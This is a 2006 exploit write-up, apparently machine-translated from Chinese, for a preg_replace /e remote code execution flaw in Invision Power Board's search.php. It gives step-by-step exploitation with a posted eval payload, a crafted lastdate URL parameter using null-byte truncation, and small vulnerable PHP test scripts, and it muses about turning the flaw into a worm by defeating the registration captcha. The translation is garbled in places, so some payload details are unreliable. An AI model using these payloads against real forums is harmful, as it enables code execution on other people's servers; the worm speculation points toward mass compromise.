ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net

Author: SuperHei_[At]_ph4nt0m.org
Blog: http://superhei.blogbus.com/
Team: http://www.ph4nt0m.org
Data: 2006-04-27

#############
##Simple analysis###
#############
The vulnerability is another one of preg_replace+/e vulnerability,代码 在 \sources\action_admin\search.php line 1 2 5 8-1 2 6 a 2:

if ( $this->ipsclass->input[‘lastdate’] )
{
$this->output = preg_replace( “#(value=["‘]{$this->ipsclass->input[‘lastdate’]}["’])#i”, "\\1

selected=‘selected’", $this->output );

}
}

By the variable input[‘lastdate’]injected/e, $this->output the injected shellcode is.

#############
##Use method###
#############

To register a user, send a patch[shellcode]as follows: [

superheixxxxxxxeval(phpinf0()); //

Note that the last of the;and//between a space

Then click the“Search”—>Search by Keywords: superheixxxxxxxeval [remember to choose Show results as posts ]

You can get searchid
http://127.0.0.1/ipb215/upload/inde…_in=posts&resul

t_type=posts&highlite=superheixxxxxxxeval

Then later added a& lastdate=z|eval.*?% 2 0//)%23e%0 0 that is, [/e]submit ok:

http://127.0.0.1/ipb215/upload/inde…_in=posts&resul

t_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?% 2 0//)%23e%0 0

#############
##Analysis of discussion###
#############

1. Reference: |
   Simple analysis:
   The vulnerability is another one of preg_replace+/e vulnerability,代码 在 \sources\action_admin\search.php line 1 2 5 8-1 2 6 a 2:

if ( $this->ipsclass->input[‘lastdate’] )
{
$this->output = preg_replace( “#(value=["‘]{$this->ipsclass->input[‘lastdate’]}["’])#i”, "\\1

selected=‘selected’", $this->output );

}
}

By the variable input[‘lastdate’]injected/e, $this->output the injected shellcode is.

---

This analysis, out an important detail: preg_replace+/e there are 3 parameters, only the first 2 parameters in the code can only be executed, but the above statement seems to be the 3 parameters submitted

The,in fact, note that the above preg_replace in the first 2 parameters:\\1 selected=‘selected’ inside\\1 is the first parameter in the regular expression try matching the value. In the final analysis

We submitted the shellcode is still on the first 2 parameters to perform.

2. Reference: note that the last of the;and//between a space

---

This again is why? Because we submitted lastdate=z|eval.*?% 2 0//)%23e%0 0. is space+//for the flag, so we submitted the shellcode must also have a space+//

3. preg_replace presence of null truncation vulnerability???

I think this should be regarded as php itself one of the vulnerabilities[before the include of null truncation vulnerability], we test the above vulnerability and write a simple model:
<?
$a=$_GET[a];
echo preg_replace(“#(value=["‘]z|eval.*?//)# e{$a}["’])#i”,"\\1 ",“heigegegxxxxxxxeval(phpinfo());//”);
?& gt;

We directly submitted http://127.0.0.1/test2. php? a=2 error:
Warning: Unknown modifier ‘2’ in d:\easyphp\www\test2.php on line 3

Submitted http://127.0.0.1/test2. php? a=%0 0 2 then execute phpinfo(). We successfully truncated. Model code-execution environment that requires gpc=off, but in many of the web application is

After a variable encoding and decoding in the implementation, so is not affected by gpc of the impact of the above ipb can at gpc=on the case of truncation.

4."lastdate=z|eval.*?% 2 0//)%23e%0 0"construction
Mainly in this->output in the eval and%2 0//to flag to take the\\1 for the execution of the php code.

5. worm use?
   Remember the Santy? Is the use of phpbb in a preg_replace here will be exploited? ipb this exploits must be landing, but in the ipb registration when there is a“picture

Authentication”, but it is said that this can write a program to read out the?? As long as the breakthrough this worm is possible, after all ipb users have so much…

#############
##Summary of the model###
#############

1. Directly in the preg_replace the first 2 variables execution mode:
   <?
   echo preg_replace(“/test/e”,$h,“jutst test”);
   ?& gt;
   Submitted http://127.0.0.1/test/1 1/preg. php? h=phpinfo()
   Examples such as: phpbb viewtopic. php variable$highliht_match submit php code execution vulnerability

2. By\\1[or\\n]extracts the first 3 variables in the php code and execution mode:
   <?
   echo preg_replace(“/\s*\php\\ [/php\]\s*/ies”, “\\1”, $h);
   ?& gt;
   Submitted to: http://127.0.0.1/test/11/preg.php?h=Codz: phpinfo()

---

Reference:
r57 exp: the http://www.milw0rm.com/exploits/1720
More information: http://www.google.com